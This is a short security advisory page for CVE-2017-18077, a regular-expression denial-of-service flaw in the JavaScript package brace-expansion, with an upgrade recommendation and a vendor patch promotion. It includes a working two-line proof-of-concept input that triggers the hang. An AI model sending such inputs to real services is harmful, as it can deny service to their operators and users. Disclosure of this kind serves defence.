.avif)
View all vulnerabilities
CVE-2017-18077
ReDoS in brace-expansion
Description
Affected versions of brace-expansion are vulnerable to a regular expression denial of service condition.
Proof of Concept
var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');
Recommendation
Update to version 1.1.7 or later.
Patch Available
Fix available through Seal Security. No upgrade required, protect your application instantly.
Fix without upgradingVulnerability Details
Score
Score Vector
Affected Versions
Severity
Ecosystem
JavaScript
Publish Date
January 29, 2018
Modified Date
November 7, 2023